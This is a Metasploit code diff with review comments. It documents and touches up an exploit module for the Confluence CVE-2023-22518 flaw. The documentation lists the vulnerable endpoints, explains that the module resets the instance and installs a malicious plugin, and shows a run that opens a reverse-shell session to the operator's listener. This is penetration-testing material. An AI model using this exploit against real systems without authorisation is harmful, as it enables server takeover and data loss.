diff --git a/documentation/modules/exploit/multi/http/atlassian_confluence_unauth_backup.md b/documentation/modules/exploit/multi/http/atlassian_confluence_unauth_backup.md new file mode 100644 index 000000000000..764251322f50 --- /dev/null +++ b/documentation/modules/exploit/multi/http/atlassian_confluence_unauth_backup.md 
@@ -0,0 +1,108 @@ +## Vulnerable Application + +This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a +Confluence instance administrator account. Using this account, an attacker can then perform all +administrative actions that are available to Confluence instance administrator. This module uses the +administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code +execution on the target in the context of the of the user running the confluence server. + +### Setup +Download and install a [vulnerable version of Atlassian Confluence](https://www.atlassian.com/software/confluence/download.). +By default the server will listen for HTTP connections on port 8090. This exploit module was tested against Confluence +8.5.1 running on Windows Server 2022. + +After running the installer the setup wizard will ask for a trial license. An Atlassian account is free and required +to obtain the trial licence. A database and a will also be required to run Confluence. Download and install +[PostgreSQL](https://www.enterprisedb.com/downloads/postgres-postgresql-downloads). The setup Wizard will ask for DB +credentials, the default PostgreSQL database can be used. + +## Verification Steps + +1. Start msfconsole +1. Do: `use atlassian_confluence_unauth_backup` +1. Set the `RHOST` +1. Run the module +1. Receive a Meterpreter session in the context of the user running the Confluence application. + +## Options + +### CONFLUENCE_TARGET_ENDPOINT + +This is the endpoint used to trigger the vulnerability, and must be reachable by an un authenticated HTTP(S) POST +request. The three vulnerable endpoints outlined by Atlassian in the advisory for this vulnerability are as follows: + - /json/setup-restore.action + - /json/setup-restore-local.action + - /json/setup-restore-progress.action' + +### CONFLUENCE_PLUGIN_TIMEOUT + +The exploit will install a malicious plugin into the Confluence server. 
Plugin installation is performed asynchronously +and we must poll the server to find out when installation has completed. This option governs the maximum amount +of time to wait for installation to complete. The timeout value is in seconds and by default this option is set to `30`. + +## Scenarios +### Windows Server 2022 running Atlassian Confluence 8.5.1 +``` +msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set rhost 172.16.199.134 +rhost => 172.16.199.134 +msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set verbose true +verbose => true +msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > options + +Module options (exploit/multi/http/atlassian_confluence_unauth_backup): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CONFLUENCE_PLUGIN_TIMEOUT 30 yes The timeout (in seconds) to wait when installing a plugin + CONFLUENCE_TARGET_ENDPOINT /json/setup-restore.action yes The endpoint used to trigger the vulnerability. (Accepted: /json/setup-restore.action, /json/setup-restore-local.action, /json/setup-restore-progress.action) + NEW_PASSWORD LELTtnOG yes Password to be used when creating a new user with admin privileges + NEW_USERNAME candace.leffler yes Username to be used when creating a new user with admin privileges + Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
+ RHOSTS 172.16.199.134 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 8090 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + VHOST no HTTP server virtual host + + +Payload options (java/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 172.16.199.1 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Java + + + +View the full module info with the info, or info -d command. + +msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > run + +[*] Started reverse TCP handler on 172.16.199.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.5.1 +[*] Setting credentials: candace.leffler:LELTtnOG +[+] Exploit Success! Login Using 'candace.leffler :: LELTtnOG' +[*] Generating payload plugin +[*] Uploading payload plugin +[*] Triggering payload plugin +[*] Deleting plugin... +[*] Sending stage (57692 bytes) to 172.16.199.134 +[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.134:50095) at 2023-12-11 18:52:33 -0500 + +meterpreter > getuid +Server username: WIN-2EEL7BRDUD8$ +meterpreter > sysinfo +Computer : WIN-2EEL7BRDUD8 +OS : Windows Server 2022 10.0 (amd64) +Architecture : x64 +System Language : en_US +Meterpreter : java/windows +meterpreter > +``` diff --git a/lib/msf/core/exploit/remote/http/atlassian/confluence/payload_plugin.rb b/lib/msf/core/exploit/remote/http/atlassian/confluence/payload_plugin.rb index b4d1106aa6f6..a2e9f97e1be9 100644 --- a/lib/msf/core/exploit/remote/http/atlassian/confluence/payload_plugin.rb +++ b/lib/msf/core/exploit/remote/http/atlassian/confluence/payload_plugin.rb 
@@ -123,7 +123,7 @@ def trigger_payload_plugin(payload_endpoint) end def delete_payload_plugin(plugin_key, payload_endpoint, admin_username, admin_password) - print_status('Deleting plugin...') + vprint_status('Deleting plugin...') res = send_request_cgi( 'method' => 'DELETE', diff --git a/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb b/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb index d1868cfebbc2..f3371baf395a 100644 --- a/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb +++ b/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb @@ -16,13 +16,13 @@ def initialize(info = {}) super( update_info( info, - 'Name' => 'Atlassian Confluence Unauth JSON setup-restore RCE', + 'Name' => 'Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)', 'Description' => %q{ - This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a - Confluence instance administrator account. Using this account, an attacker can then perform all - administrative actions that are available to Confluence instance administrator. This module uses the - administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code - execution on the target in the context of the of the user running the confluence server. + This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a + Confluence instance administrator account. Using this account, an attacker can then perform all + administrative actions that are available to Confluence instance administrator. This module uses the + administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code + execution on the target in the context of the of the user running the confluence server. }, 'Author' => [ 'Atlassian', # Discovery 
@@ -58,7 +58,7 @@ def initialize(info = {}) OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/), OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]), # The endpoint we target to trigger the vulnerability. - OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action','/json/setup-restore-local.action','/json/setup-restore-progress.action']]), + OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action', '/json/setup-restore-local.action', '/json/setup-restore-progress.action']]), # We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait. OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30]) ] @@ -70,9 +70,9 @@ def check # Confluence Serer and Confluence Data Center have the same vulnerable version ranges. if confluence_version.between?(Rex::Version.new('1.0.0'), Rex::Version.new('7.19.15')) || - confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) || - confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) || - confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2')) + confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) || + confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) || + confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2')) return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}") end 
@@ -123,7 +123,7 @@ def upload_backup 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'keep_cookies' => true, 'headers' => { - 'X-Atlassian-Token' => 'no-check', + 'X-Atlassian-Token' => 'no-check' }, 'vars_get' => { 'synchronous' => 'true' @@ -140,7 +140,7 @@ def exploit # Exploit CVE-2023-22518 by uploading a backup .zip file to confluence with an attacker defined username & password upload_backup - # Now with admin access, upload a .jsp plugin to gain RCE on the target system. + # Now with admin access, upload a .jsp plugin using the PayloadPlugin mixin to gain RCE on the target system. payload_endpoint = rand_text_alphanumeric(8) plugin_key = rand_text_alpha(8) begin
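Review bot: In the new documentation hunk (`@@ -0,0 +1,108 @@`, documentation/modules/exploit/multi/http/atlassian_confluence_unauth_backup.md) the Vulnerable Application section says the vulnerability lets an attacker "reset Confluence", yet neither Verification Steps nor Scenarios warns that running the module is therefore disruptive to the target instance; add a sentence to that effect before the "Run the module" step so nobody treats this as a non-destructive check, and note that the administrator account created from NEW_USERNAME/NEW_PASSWORD (shown as "Login Using 'candace.leffler :: LELTtnOG'") is left on the target, since the module only deletes the plugin. Several typos should be fixed while the file is new: "in the context of the of the user", "A database and a will also be required" (a noun is missing after "a"), "un authenticated" should be "unauthenticated", the third endpoint carries a stray apostrophe (`/json/setup-restore-progress.action'`), and the download link ends in `download.)` so the period becomes part of the URL. Verification step 2 should use the full path that the Scenarios prompt shows, `use exploit/multi/http/atlassian_confluence_unauth_backup`, and step 3 says `RHOST` where the option table lists `RHOSTS`.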
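Review bot: In the payload_plugin.rb hunk (`@@ -123,7 +123,7 @@`, delete_payload_plugin) downgrading 'Deleting plugin...' to vprint_status is fine for the success path, but this deletion is the module's cleanup of an artifact it installed on the target, so please confirm that the failure branch after the DELETE request (not in this hunk) still prints a warning or error unconditionally; an operator running without verbose must still learn that the plugin was left behind. The Scenarios output in the docs was captured with `set verbose true`, so it still shows the line and needs no change.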
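Review bot: In the module's `@@ -16,13 +16,13 @@` hunk the Description lines are only re-indented, so the typo "in the context of the of the user running the confluence server" (duplicated "of the", lowercase "confluence") survives the rewrite; since these lines are already touched, fix it here: `execution on the target in the context of the user running the Confluence server.` The new Name embeds CVE-2023-22518; please make sure the same identifier appears in the module's References (outside this diff) so the two agree.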
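Review bot: In the `@@ -58,7 +58,7 @@` hunk the OptEnum change is whitespace-only, but on the adjacent NEW_USERNAME line the regex `/^[a-z._@]+$/` uses `^` and `$`, which in Ruby anchor at line boundaries rather than at the ends of the string; `/\A[a-z._@]+\z/` is the idiomatic whole-value check. That character class also excludes digits and hyphens while the default comes from Faker::Internet.username; if that generator can emit such characters the default would fail its own validation, so either widen the class or constrain the generator.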
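Review bot: In the `@@ -70,9 +70,9 @@` hunk of check the change only re-indents the `||` continuation lines; the context line above still reads "Confluence Serer" and should be "Confluence Server". The upper bounds (7.19.15, 8.3.3, 8.4.3, 8.5.2) are stated without explanation; add a comment naming the fixed versions from the Atlassian advisory they were derived from, and what check returns for a version outside all four ranges, so the next person updating the ranges does not silently drop an affected release line.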
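Review bot: In the `@@ -140,7 +140,7 @@` hunk of exploit the comment now names the PayloadPlugin mixin, which helps; the comment on the line above `upload_backup` should likewise say that this call performs the reset described in the Description (the attacker-defined backup is uploaded and the instance state replaced), because that is the irreversible step and should be flagged where the code does it. Since the hunk ends at `begin`, please confirm the matching `ensure` (not shown) calls delete_payload_plugin so a failure in trigger_payload_plugin does not leave the plugin installed.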